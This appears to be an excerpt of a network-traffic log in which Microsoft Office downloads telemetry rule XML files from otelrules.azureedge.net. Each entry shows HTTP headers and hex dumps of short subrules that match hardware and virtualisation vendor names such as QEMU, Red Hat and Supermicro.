                                                                                                      2024-10-08 18:51:29 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      60192.168.2.74976713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 502
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                      x-ms-request-id: 7904a895-101e-0079-67f2-185913000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48tnj6wmberkg2xy800000005gg000000008u51
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      61192.168.2.74976313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 485
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                      x-ms-request-id: 8d3bec0a-601e-0070-32fe-16a0c9000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48cpbzgkvtewk0wu000000005dg00000000rama
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      62192.168.2.74976513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 470
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                      x-ms-request-id: e72b6989-501e-005b-2b00-17d7f7000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd4824mj9d6vp65b6n400000005fg00000000zbwy
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      63192.168.2.74977113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:30 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:30 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:30 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 474
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                      x-ms-request-id: ef9cab6f-f01e-0099-0d00-179171000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185130Z-1657d5bbd48jwrqbupe3ktsx9w00000005eg000000015k9r
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:30 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      64192.168.2.74977413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:30 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:32 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:32 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 407
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                      x-ms-request-id: 78a0432a-701e-001e-1805-17f5e6000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185132Z-1657d5bbd48wd55zet5pcra0cg00000005ag00000000ksku
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:32 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      65192.168.2.74977213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:30 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:30 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:30 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 408
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                      x-ms-request-id: 2f519f63-901e-0016-75ff-16efe9000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185130Z-1657d5bbd48sqtlf1huhzuwq70000000051g00000000uan7
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:30 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      66192.168.2.74977313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:30 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:30 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:30 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 416
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                      x-ms-request-id: 821e4157-c01e-0014-3301-17a6a3000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185130Z-1657d5bbd48dfrdj7px744zp8s000000052g00000000sc7g
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      67192.168.2.74977513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:30 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:30 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:30 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 469
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                      x-ms-request-id: b67c2655-301e-0096-2300-17e71d000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185130Z-1657d5bbd48cpbzgkvtewk0wu000000005e000000000my36
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      68192.168.2.74977813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:31 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:31 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 472
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                      x-ms-request-id: 763e8d43-601e-000d-6912-172618000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185131Z-1657d5bbd48q6t9vvmrkd293mg000000059000000000vd10
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      69192.168.2.74977913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:31 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:31 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 432
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                      x-ms-request-id: 897bc565-f01e-0096-5e60-1710ef000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185131Z-1657d5bbd482krtfgrg72dfbtn000000056g000000004h2f
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:31 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      70192.168.2.74978113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:31 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
